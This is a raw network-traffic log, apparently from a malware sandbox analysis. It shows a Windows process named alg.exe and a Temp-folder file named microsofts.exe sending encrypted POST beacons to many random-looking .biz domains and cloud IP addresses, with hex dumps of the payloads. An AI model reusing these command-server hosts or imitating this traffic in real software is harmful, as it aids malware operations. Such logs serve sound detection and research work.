                                                                                                                                                                                                                                                                                                          48192.168.2.55002918.208.156.248807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.883474112 CEST352OUTPOST /thacrmsw HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.883879900 CEST778OUTData Raw: 59 13 66 57 7d 0d 86 14 fe 02 00 00 2a 15 61 1b 3f 04 00 9e 0b a6 f0 73 25 d3 86 85 9a 30 46 6b e7 30 db 34 ac fb e2 43 a4 c8 f2 68 11 90 5d e5 5d a7 ac d2 f4 95 6e af 15 64 d5 2e d6 ec ed 45 5e a5 71 8f 47 ff 05 5f 0f 81 e2 2d 76 14 da e0 ef a3
                                                                                                                                                                                                                                                                                                          Data Ascii: YfW}*a?s%0Fk04Ch]]nd.E^qG_-v%AEQT@U4,|p;,R<ig{`+p>?uT./_aE,;OZw/Z0Q zU)>T@ke-wUq%)SOk&R@K14G
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.339660883 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:35 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=65eadb769c84c110c1181167695f80a4|8.46.123.33|1728547715|1728547715|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          49192.168.2.55003013.251.16.150807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.551043987 CEST351OUTPOST /rdoagulou HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.551054955 CEST778OUTData Raw: d0 63 f6 48 60 5e 43 e8 fe 02 00 00 da 35 7f 5a 6f f9 9a 68 9c 53 a1 70 d6 2e ff 2b cd dc 29 61 93 79 24 38 c1 f9 8c 75 28 20 06 e4 9b b5 35 11 eb 86 49 4f ce 01 47 b4 3a 78 16 ea 55 1f 57 2e a0 28 26 9d 66 87 ef 0c 27 98 86 bd e7 ac 2d 67 12 a5
                                                                                                                                                                                                                                                                                                          Data Ascii: cH`^C5ZohSp.+)ay$8u( 5IOG:xUW.(&f'-gAIBfs'7X_Ao`7{(6"RXID22cK"80]D4RSXe^_BZ1PFV=EJ[F~)vR4f3BdbX
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.919369936 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:36 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=89d622ff21642884e7a31b2e252d1b95|8.46.123.33|1728547716|1728547716|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          50192.168.2.55003113.251.16.150807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143621922 CEST346OUTPOST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143646955 CEST778OUTData Raw: 6d 6e ec e2 dd c9 1a d5 fe 02 00 00 ff 14 22 b9 40 e4 f3 0d e8 28 c4 4b 42 50 bc a5 26 52 c1 36 6a a3 2c 78 b7 a4 a5 05 91 fc 48 9b ea 88 c5 5e 77 b0 7c ac d4 2f 99 85 c6 b1 21 37 c8 e8 00 8e 0f 0f 97 65 e6 39 dc a3 16 3c d9 32 a6 b2 d2 11 38 4f
                                                                                                                                                                                                                                                                                                          Data Ascii: mn"@(KBP&R6j,xH^w|/!7e9<28OAd?c =V'?[Z9%;m(oY*@'*f#!7ZiL89}p*Pgu;uxgU')(K(?h#T6KyQWUC}}
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521459103 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:38 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=ed8025b138d0b9c7c84934ad767fcdf3|8.46.123.33|1728547718|1728547718|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          51192.168.2.55003234.211.97.45807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.753678083 CEST346OUTPOST /jk HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.753776073 CEST778OUTData Raw: 3f 3f 65 70 03 a0 79 ce fe 02 00 00 84 ce 04 46 2a 1a 03 db 57 24 ab b1 30 bf cf 1f 0a ca 76 03 8b 76 83 ea 3d c9 bc 3e d9 7b 3c 83 bf b6 20 ed 1d 5f 97 98 08 cb c7 b8 d2 2f 02 db 56 87 83 ab 74 72 a8 0b e6 5c 9a 1f ba a0 07 94 b2 2a fd 95 a9 5d
                                                                                                                                                                                                                                                                                                          Data Ascii: ??epyF*W$0vv=>{< _/Vtr\*]+AIsb5aR;;h}p|H"xmH}[ `/$nJs8ZMwl!Nv=;i;Ip Oe_"!Ja.BGKYoXhEasb0
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636487961 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:39 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=2536269235145a812c6a6ae0004bac60|8.46.123.33|1728547719|1728547719|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          52192.168.2.55003347.129.31.212807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.946084023 CEST350OUTPOST /kjqwmlcq HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.946098089 CEST778OUTData Raw: af fd e6 21 3b 7f 29 35 fe 02 00 00 4d 09 f4 a0 39 b2 c3 51 e1 de 4a cf 0b 18 22 95 97 e2 f3 33 ab fb 8f 7b 86 ff d4 d6 4e bf 21 b0 76 bb d7 f0 ae 52 0b 1e 0e 72 b2 7c f5 82 69 0d a0 76 98 51 36 88 4b e0 17 d4 3c 12 bf f3 44 c0 86 70 f1 12 f3 94
                                                                                                                                                                                                                                                                                                          Data Ascii: !;)5M9QJ"3{N!vRr|ivQ6K<Dp&3@VkTUB6m;_?Qo- u(y7d|573[dXD`78y8=d8_in|]``RnK(KRW owwn+rZ]o
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.302709103 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:41 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=2e97e718355aa00502ccc963d1ab168b|8.46.123.33|1728547721|1728547721|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          53192.168.2.55003413.251.16.150807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.529721022 CEST357OUTPOST /uluonacniewnep HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.529752970 CEST778OUTData Raw: 1b 3d 22 c5 59 d6 a2 a8 fe 02 00 00 e0 76 4d 55 c3 aa 99 eb 7b fb 27 93 44 f7 5c 3a 78 fb bd ef 51 ab 7c 60 65 61 7d aa 95 bb 80 66 64 e9 98 6d ce 33 6d 91 7e 3f f9 b2 07 a2 16 a0 4a 0d fd 98 48 de a1 44 a1 58 66 25 81 0f 02 5d 7c 53 20 75 1e 76
                                                                                                                                                                                                                                                                                                          Data Ascii: ="YvMU{'D\:xQ|`ea}fdm3m~?JHDXf%]|S uvr)xgaD9SE`TQ}f5Mwos`SETc&ztZvsaqWG-\,l/z%9]KqAY"5j":=FccPbzuZR!3
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.906094074 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:42 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=b30e2c74c626f589fcd53350420184fd|8.46.123.33|1728547722|1728547722|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          54192.168.2.55003534.211.97.45807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.246237993 CEST342OUTPOST /n HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: esuzf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.246908903 CEST778OUTData Raw: 20 bd 1b 13 e1 85 db c5 fe 02 00 00 21 37 ca a6 3f 94 87 d5 ff 2a a5 39 97 16 43 22 bd 0f cf 0d cc 9e 08 83 38 b7 78 26 f5 eb 01 70 aa 83 a4 1c a5 56 3c 58 5a c6 71 01 f8 4a 44 97 d8 d4 5b c4 a9 77 3a e1 31 dd 3e 02 92 59 24 39 6c 64 94 b6 eb 8e
                                                                                                                                                                                                                                                                                                          Data Ascii: !7?*9C"8x&pV<XZqJD[w:1>Y$9ldYegk$`IjJ1-t'H{D7E.dBCOV7.6zZPb#o|7/CKpl&E7'{rk#6:}&v?9X"_bf0hk#
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.971321106 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:43 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=87396c7ab743c7c3ee1b33fe97cd6d03|8.46.123.33|1728547723|1728547723|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          55192.168.2.55003647.129.31.21280576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.906249046 CEST350OUTPOST /vpbxgqp HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.906280994 CEST828OUTData Raw: 66 54 49 1a c7 d2 2e 8d 30 03 00 00 b3 07 d8 32 0e 42 08 a6 e7 50 ff ae 10 f3 55 7d d3 21 d6 a4 8f 29 ea 08 75 f2 7e fc 52 06 06 f0 0a 6b de 9e 1b 21 f1 1d 8a 22 a6 7a 89 9c 09 b0 77 60 cd 34 67 67 93 bf f9 03 f5 9d 41 2c 22 ea f7 4b 14 ee 8c 25
                                                                                                                                                                                                                                                                                                          Data Ascii: fTI.02BPU}!)u~Rk!"zw`4ggA,"K%a6-;) jp"YJncv!Q9Td(U8$e~k0o^)HI$OE^9L5v\tPF!)$ex&"(ru_A(UE
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.269949913 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:45 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=415e06fdbe033d5919286f8815043898|8.46.123.33|1728547725|1728547725|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          56192.168.2.5500373.94.10.34807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.270044088 CEST353OUTPOST /hqowbucy HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.270076990 CEST778OUTData Raw: 8f ae d9 2f 5d 34 bc 6a fe 02 00 00 61 bb a5 54 50 67 c3 cb d3 41 e9 61 61 97 cb 27 39 83 47 9d 68 d6 0b d9 90 b2 fc 54 18 ba b9 bd b1 2f b2 ee 03 48 62 16 a1 26 b9 04 14 20 6b 4a 83 43 07 5c 10 fe ab 02 5c b1 ba 11 f1 a6 74 d6 e8 e4 1f 80 11 63
                                                                                                                                                                                                                                                                                                          Data Ascii: /]4jaTPgAaa'9GhT/Hb& kJC\\tc<+:3'd`GeM~9[3xEG='pEjyJbhXU\*}%v_z7:N"s^a2RRK,jA=fKkB'd:gr?s$G>
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.742204905 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:44 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=1d9c5911d9cb031a23bd3643761ddcfc|8.46.123.33|1728547724|1728547724|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          57192.168.2.55003844.213.104.86807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.161293983 CEST346OUTPOST /ohp HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.161312103 CEST778OUTData Raw: 69 5e a2 a0 b9 e0 06 f5 fe 02 00 00 ba a9 98 24 a0 9d 18 4a 5c 92 f8 aa 6c 53 ad 43 74 bb 24 53 43 ac f1 4f 49 08 f6 0a f6 48 7e 14 ea 58 28 87 c5 f1 91 de a1 dc 56 27 98 95 61 99 57 c0 5c 6d ae cb d2 ff 8e ee e4 19 9b d9 7d 44 57 98 4e a0 f9 f2
                                                                                                                                                                                                                                                                                                          Data Ascii: i^$J\lSCt$SCOIH~X(V'aW\m}DWNz\p5P}dZ%D#eMoo}!Uj\CB:rb%df(l+r9)~+n~&caPOkPrHmzG[%UJs* t!Z\-)^
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.638771057 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:45 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=aa5862c9a8f575cb8d37fb2782cfd8d4|8.46.123.33|1728547725|1728547725|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          58192.168.2.55003913.251.16.15080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.313863993 CEST355OUTPOST /wkqumdvynqwto HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.313888073 CEST828OUTData Raw: 95 75 2d b0 13 55 bd ad 30 03 00 00 cc fe 14 c9 0e 1f 71 35 67 c1 82 38 56 f6 d2 39 c6 1e 76 8b b4 56 81 7c 32 39 34 58 70 9a f1 07 3e b9 89 8c f7 04 55 14 eb 33 d6 a3 6a a2 e3 2a 10 0a f0 1a 58 47 f0 4c ea 2a 38 4e 3f 9b a7 2a 00 d7 2a 95 c3 43
                                                                                                                                                                                                                                                                                                          Data Ascii: u-U0q5g8V9vV|294Xp>U3j*XGL*8N?**CjU;"l)Ny%gXv4rU;t! H0.!M&5!u:II9inhP^\*t)?#17IHb\S7/uX
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.708317995 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:46 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=82fde5c2bf731d995396de9e5669cae2|8.46.123.33|1728547726|1728547726|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
